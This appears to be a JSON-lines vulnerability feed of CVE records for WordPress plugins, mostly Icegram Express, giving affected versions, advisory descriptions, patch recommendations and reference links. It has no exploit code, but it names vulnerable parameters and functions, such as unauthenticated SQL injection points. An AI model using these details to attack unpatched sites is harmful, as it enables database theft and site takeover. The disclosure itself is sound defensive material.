{"CVE_ID":"CVE-2024-12311","slug":"email-subscribers","versionImpact":"5.7.43","versionEndExcluding":"5.7.44","description":"The Email Subscribers by Icegram Express  WordPress plugin before 5.7.44 does not sanitize and escape a parameter before using it in a SQL statement, allowing admins to perform SQL injection attacks","recommendation":"Update to version 5.7.44, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5e00ba37-da7f-4703-a0b9-65237696fbdd\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5e00ba37-da7f-4703-a0b9-65237696fbdd\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8771","slug":"email-subscribers","versionImpact":"5.7.34","versionEndExcluding":"5.7.35","description":"The Email Subscribers by Icegram Express \u2013 Email Marketing, Newsletters, Automation for WordPress & WooCommerce plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'preview_email_template_design' function in all versions up to, and including, 5.7.34. This makes it possible for authenticated attackers, with Subscriber-level access and above, to extract sensitive data including the content of private, password protected, pending, and draft posts and pages.","recommendation":"Update to version 5.7.35, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f9d90717-fd48-493b-9293-32976bf2cada?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f9d90717-fd48-493b-9293-32976bf2cada?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-subscribers\\\/trunk\\\/lite\\\/admin\\\/class-email-subscribers-admin.php#L1754\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-subscribers\\\/trunk\\\/lite\\\/admin\\\/class-email-subscribers-admin.php#L1754\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3157336\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3157336\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8254","slug":"email-subscribers","versionImpact":"5.7.34","versionEndExcluding":"5.7.35","description":"The Email Subscribers by Icegram Express \u2013 Email Marketing, Newsletters, Automation for WordPress & WooCommerce plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 5.7.34. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute arbitrary shortcodes.","recommendation":"Update to version 5.7.35, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7d4ae4a7-aec1-4cc1-bea0-61dde44027fc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7d4ae4a7-aec1-4cc1-bea0-61dde44027fc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-subscribers\\\/tags\\\/5.7.29\\\/lite\\\/includes\\\/class-es-common.php#L244\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-subscribers\\\/tags\\\/5.7.29\\\/lite\\\/includes\\\/class-es-common.php#L244\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3157336\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3157336\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1554","slug":"quick-paypal-payments","versionEndExcluding":"5.7.26.4","description":"The Quick Paypal Payments WordPress plugin before 5.7.26.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0d247a3d-154e-4da7-a147-c1c7e1b5e87e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0d247a3d-154e-4da7-a147-c1c7e1b5e87e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5756","slug":"email-subscribers","versionImpact":"5.7.23","versionEndExcluding":"5.7.24","description":"The Email Subscribers by Icegram Express \u2013 Email Marketing, Newsletters, Automation for WordPress & WooCommerce plugin for WordPress is vulnerable to time-based SQL Injection via the db parameter in all versions up to, and including, 5.7.23 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 5.7.24, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c5bd11c6-2f55-4eee-834a-c4e405482b9c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c5bd11c6-2f55-4eee-834a-c4e405482b9c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-subscribers\\\/trunk\\\/lite\\\/includes\\\/db\\\/class-es-db-contacts.php#L532\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-subscribers\\\/trunk\\\/lite\\\/includes\\\/db\\\/class-es-db-contacts.php#L532\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3101638\\\/email-subscribers\\\/trunk\\\/lite\\\/includes\\\/db\\\/class-es-db-contacts.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3101638\\\/email-subscribers\\\/trunk\\\/lite\\\/includes\\\/db\\\/class-es-db-contacts.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4845","slug":"email-subscribers","versionImpact":"5.7.22","versionEndExcluding":"5.7.23","description":"The Icegram Express plugin for WordPress is vulnerable to SQL Injection via the \u2018options[list_id]\u2019 parameter in all versions up to, and including, 5.7.22 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 5.7.23, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/21be2215-8ce0-438e-94e0-6a350b8cc952?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/21be2215-8ce0-438e-94e0-6a350b8cc952?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3098321\\\/email-subscribers\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3098321\\\/email-subscribers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4295","slug":"email-subscribers","versionImpact":"5.7.20","versionEndExcluding":"5.7.21","description":"The Email Subscribers by Icegram Express plugin for WordPress is vulnerable to SQL Injection via the \u2018hash\u2019 parameter in all versions up to, and including, 5.7.20 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 5.7.21, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/641123af-1ec6-4549-a58c-0a08b4678f45?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/641123af-1ec6-4549-a58c-0a08b4678f45?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090845\\\/email-subscribers\\\/trunk\\\/lite\\\/includes\\\/db\\\/class-es-db-lists-contacts.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090845\\\/email-subscribers\\\/trunk\\\/lite\\\/includes\\\/db\\\/class-es-db-lists-contacts.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4010","slug":"email-subscribers","versionImpact":"5.7.19","versionEndExcluding":"5.7.20","description":"The Email Subscribers by Icegram Express plugin for WordPress is vulnerable to unauthorized access of data, modification of data, and loss of data due to a missing capability check on the handle_ajax_request function in all versions up to, and including, 5.7.19. This makes it possible for authenticated attackers, with subscriber-level access and above, to cause a loss of confidentiality, integrity, and availability, by performing multiple unauthorized actions. Some of these actions could also be leveraged to conduct PHP Object Injection and SQL Injection attacks.","recommendation":"Update to version 5.7.20, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/23bfcdd1-b99d-47eb-9f88-96f9ecc53b32?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/23bfcdd1-b99d-47eb-9f88-96f9ecc53b32?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083762\\\/email-subscribers\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083762\\\/email-subscribers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3626","slug":"email-subscribers","versionImpact":"5.7.17","versionEndExcluding":"5.7.18","description":"The Email Subscribers by Icegram Express \u2013 Email Marketing, Newsletters, Automation for WordPress & WooCommerce plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the get_template_content function in all versions up to, and including, 5.7.17. This makes it possible for authenticated attackers, with subscriber access and above, to obtain the contents of private and password-protected posts.","recommendation":"Update to version 5.7.18, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5a56e621-2508-4500-b865-4d5e4463b91a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5a56e621-2508-4500-b865-4d5e4463b91a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-subscribers\\\/trunk\\\/lite\\\/includes\\\/class-email-subscribers.php#L1063\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-subscribers\\\/trunk\\\/lite\\\/includes\\\/class-email-subscribers.php#L1063\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-subscribers\\\/trunk\\\/lite\\\/admin\\\/class-email-subscribers-admin.php#L849\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-subscribers\\\/trunk\\\/lite\\\/admin\\\/class-email-subscribers-admin.php#L849\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3072302%40email-subscribers%2Ftrunk&old=3069441%40email-subscribers%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3072302%40email-subscribers%2Ftrunk&old=3069441%40email-subscribers%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2876","slug":"email-subscribers","versionImpact":"5.7.14","versionEndExcluding":"5.7.15","description":"The Email Subscribers by Icegram Express \u2013 Email Marketing, Newsletters, Automation for WordPress & WooCommerce plugin for WordPress is vulnerable to SQL Injection via the 'run' function of the 'IG_ES_Subscribers_Query' class in all versions up to, and including, 5.7.14 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 5.7.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e0ca6ac4-0d89-4601-94fc-cce5a0af9c56?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e0ca6ac4-0d89-4601-94fc-cce5a0af9c56?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/WordpressPluginDirectory\\\/email-subscribers\\\/blob\\\/main\\\/email-subscribers\\\/lite\\\/includes\\\/classes\\\/class-ig-es-subscriber-query.php#L304\",\"name\":\"https:\\\/\\\/github.com\\\/WordpressPluginDirectory\\\/email-subscribers\\\/blob\\\/main\\\/email-subscribers\\\/lite\\\/includes\\\/classes\\\/class-ig-es-subscriber-query.php#L304\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/WordpressPluginDirectory\\\/email-subscribers\\\/blob\\\/main\\\/email-subscribers\\\/lite\\\/admin\\\/class-email-subscribers-admin.php#L1433\",\"name\":\"https:\\\/\\\/github.com\\\/WordpressPluginDirectory\\\/email-subscribers\\\/blob\\\/main\\\/email-subscribers\\\/lite\\\/admin\\\/class-email-subscribers-admin.php#L1433\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3060251\\\/email-subscribers\\\/trunk\\\/lite\\\/includes\\\/classes\\\/class-ig-es-subscriber-query.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3060251\\\/email-subscribers\\\/trunk\\\/lite\\\/includes\\\/classes\\\/class-ig-es-subscriber-query.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6600","slug":"host-webfonts-local","versionImpact":"5.7.9","versionEndExcluding":"5.7.10","description":"The OMGF | GDPR\/DSGVO Compliant, Faster Google Fonts. Easy. plugin for WordPress is vulnerable to unauthorized modification of data and Stored Cross-Site Scripting due to a missing capability check on the update_settings() function hooked via admin_init in all versions up to, and including, 5.7.9. This makes it possible for unauthenticated attackers to update the plugin's settings which can be used to inject Cross-Site Scripting payloads and delete entire directories. Please note there were several attempted patches, and we consider 5.7.10 to be the most sufficiently patched.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4e835b97-c066-4e8f-b99f-1a930105af0c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4e835b97-c066-4e8f-b99f-1a930105af0c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3008876%40host-webfonts-local&new=3008876%40host-webfonts-local&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3008876%40host-webfonts-local&new=3008876%40host-webfonts-local&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3009010%40host-webfonts-local&new=3009010%40host-webfonts-local&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3009010%40host-webfonts-local&new=3009010%40host-webfonts-local&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3009453%40host-webfonts-local&new=3009453%40host-webfonts-local&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3009453%40host-webfonts-local&new=3009453%40host-webfonts-local&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7856","slug":"mp3-music-player-by-sonaar","versionImpact":"5.7.0.1","versionEndExcluding":"5.7.1","description":"The MP3 Audio Player \u2013 Music Player, Podcast Player & Radio by Sonaar plugin for WordPress is vulnerable to unauthorized arbitrary file deletion due to a missing capability check on the removeTempFiles() function and insufficient path validation on the 'file' parameter in all versions up to, and including, 5.7.0.1. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete arbitrary files which can make remote code execution possible when wp-config.php is deleted.","recommendation":"Update to version 5.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/43adc9dd-1780-440f-90c2-ff05a22eb084?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/43adc9dd-1780-440f-90c2-ff05a22eb084?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mp3-music-player-by-sonaar\\\/tags\\\/5.7.0.1\\\/includes\\\/class-sonaar-music.php#L755\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mp3-music-player-by-sonaar\\\/tags\\\/5.7.0.1\\\/includes\\\/class-sonaar-music.php#L755\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3142445\\\/mp3-music-player-by-sonaar\\\/trunk\\\/includes\\\/class-sonaar-music.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3142445\\\/mp3-music-player-by-sonaar\\\/trunk\\\/includes\\\/class-sonaar-music.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mp3-music-player-by-sonaar\\\/tags\\\/5.7.0.1\\\/includes\\\/class-sonaar-music.php#L739\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mp3-music-player-by-sonaar\\\/tags\\\/5.7.0.1\\\/includes\\\/class-sonaar-music.php#L739\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4372","slug":"litespeed-cache","versionImpact":"5.6","versionEndExcluding":"5.7","description":"The LiteSpeed Cache plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'esi' shortcode in versions up to, and including, 5.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/27026f0f-c85e-4409-9973-4b9cb8a90da5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/27026f0f-c85e-4409-9973-4b9cb8a90da5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/litespeed-cache\\\/tags\\\/5.5.1\\\/src\\\/esi.cls.php#L480\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/litespeed-cache\\\/tags\\\/5.5.1\\\/src\\\/esi.cls.php#L480\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/litespeedtech\\\/lscache_wp\\\/commit\\\/95a407d9f192b37ac6cf96d2aa50f240e3e6b2d7#diff-7b2c514b58d1b8a71655607bdfab87cedb013bc1b8927ce0b49a89ddf4a7e01cR495\",\"name\":\"https:\\\/\\\/github.com\\\/litespeedtech\\\/lscache_wp\\\/commit\\\/95a407d9f192b37ac6cf96d2aa50f240e3e6b2d7#diff-7b2c514b58d1b8a71655607bdfab87cedb013bc1b8927ce0b49a89ddf4a7e01cR495\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2977143\\\/litespeed-cache#file348\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2977143\\\/litespeed-cache#file348\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10614","slug":"customer-reviews-woocommerce","versionImpact":"5.61.0","versionEndExcluding":"5.62.0","description":"The Customer Reviews for WooCommerce plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the cancel_import() function in all versions up to, and including, 5.61.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to cancel an import or check on its status.","recommendation":"Update to version 5.62.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e27224aa-56c4-49ab-b9b3-b431b38e126e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e27224aa-56c4-49ab-b9b3-b431b38e126e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3188169\\\/customer-reviews-woocommerce\\\/trunk\\\/includes\\\/import-export\\\/class-cr-reviews-importer.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3188169\\\/customer-reviews-woocommerce\\\/trunk\\\/includes\\\/import-export\\\/class-cr-reviews-importer.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11463","slug":"debounce-io-email-validator","versionImpact":"5.6.5","versionEndExcluding":"5.6.6","description":"The DeBounce Email Validator plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'from', 'to', and 'key' parameters in all versions up to, and including, 5.6.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 5.6.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3194566%40debounce-io-email-validator&new=3194566%40debounce-io-email-validator&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3194566%40debounce-io-email-validator&new=3194566%40debounce-io-email-validator&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39e8c8e1-5bf4-4e4a-91a3-cf884cccf374?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39e8c8e1-5bf4-4e4a-91a3-cf884cccf374?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5555","slug":"bdthemes-element-pack-lite","versionImpact":"5.6.5","versionEndExcluding":"5.6.6","description":"The Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid & Carousel, Remote Arrows) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018social-link-title\u2019 parameter in all versions up to, and including, 5.6.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.6.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cdb69e0e-f3d4-4b5b-9bdf-14018f4c7ecc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cdb69e0e-f3d4-4b5b-9bdf-14018f4c7ecc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/modules\\\/member\\\/widgets\\\/member.php#L1273\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/modules\\\/member\\\/widgets\\\/member.php#L1273\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3096559\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3096559\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4943","slug":"miniorange-2-factor-authentication","versionImpact":"5.6.5","versionEndExcluding":"5.6.6","description":"The miniOrange's Google Authenticator plugin for WordPress is vulnerable to authorization bypass due to a missing capability check when changing plugin settings in versions up to, and including, 5.6.5. This makes it possible for unauthenticated attackers to change the plugin's settings.","recommendation":"Update to version 5.6.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7267ede1-7745-47cc-ac0d-4362140b4c23?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7267ede1-7745-47cc-ac0d-4362140b4c23?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2842228%40miniorange-2-factor-authentication%2Ftrunk&old=2815645%40miniorange-2-factor-authentication%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2842228%40miniorange-2-factor-authentication%2Ftrunk&old=2815645%40miniorange-2-factor-authentication%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4213","slug":"wp-easycart","versionImpact":"5.6.4","versionEndExcluding":"5.6.5","description":"The Shopping Cart & eCommerce Store plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 5.6.4 via the order report functionality. This makes it possible for unauthenticated attackers to extract sensitive data including order details such as payment details, addresses and other PII.","recommendation":"Update to version 5.6.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/93daab72-1243-4a05-91d3-9254a1aac727?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/93daab72-1243-4a05-91d3-9254a1aac727?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3084202\\\/wp-easycart\\\/trunk\\\/admin\\\/inc\\\/wp_easycart_admin.php?old=3068711&old_path=wp-easycart%2Ftrunk%2Fadmin%2Finc%2Fwp_easycart_admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3084202\\\/wp-easycart\\\/trunk\\\/admin\\\/inc\\\/wp_easycart_admin.php?old=3068711&old_path=wp-easycart%2Ftrunk%2Fadmin%2Finc%2Fwp_easycart_admin.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2346","slug":"filebird","versionImpact":"5.6.3","versionEndExcluding":"5.6.4","description":"The FileBird \u2013 WordPress Media Library Folders & File Manager plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 5.6.3 via folder deletion due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with author access or higher, to delete folders created by other users and make their file uploads visible.","recommendation":"Update to version 5.6.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/82cde234-ae87-438f-911e-bdd0e3ac1132?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/82cde234-ae87-438f-911e-bdd0e3ac1132?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3060898%40filebird%2Ftrunk&old=3049188%40filebird%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3060898%40filebird%2Ftrunk&old=3049188%40filebird%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
